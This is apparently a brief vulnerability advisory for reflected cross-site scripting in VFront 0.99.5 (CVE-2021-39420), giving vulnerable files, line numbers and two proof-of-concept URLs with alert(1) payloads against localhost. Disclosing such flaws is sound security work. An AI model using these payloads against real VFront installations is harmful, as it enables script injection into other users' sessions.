Cross site scripting in VFront v0.99.5

Multiple cross site scripting vulnerabilities are present in VFront 0.99.5. The following is detailed information about these vulnerabilities:

file: search_all.php
line: 104
exploit: http://localhost/vfront-0.99.51/search_all.php?s=%22alert(1);

file: add.attach.php
line: 351
exploit: http://localhost/vfront-0.99.51/add.attach.php?feed=ko&id=1&t=tabella&msg=alert(1);
Notes: the parameter 't' must be the name of an existing table inside the database managed by vfront.

Above vulnerabilities are published at CVE-2021-39420

This vulnerability was detected as part of the DARPA CHESS program

Systems and Internet Security Lab

UIC Computer Science

Cross site scripting in VFront v0.99.5

Cross site scripting in VFront v0.99.5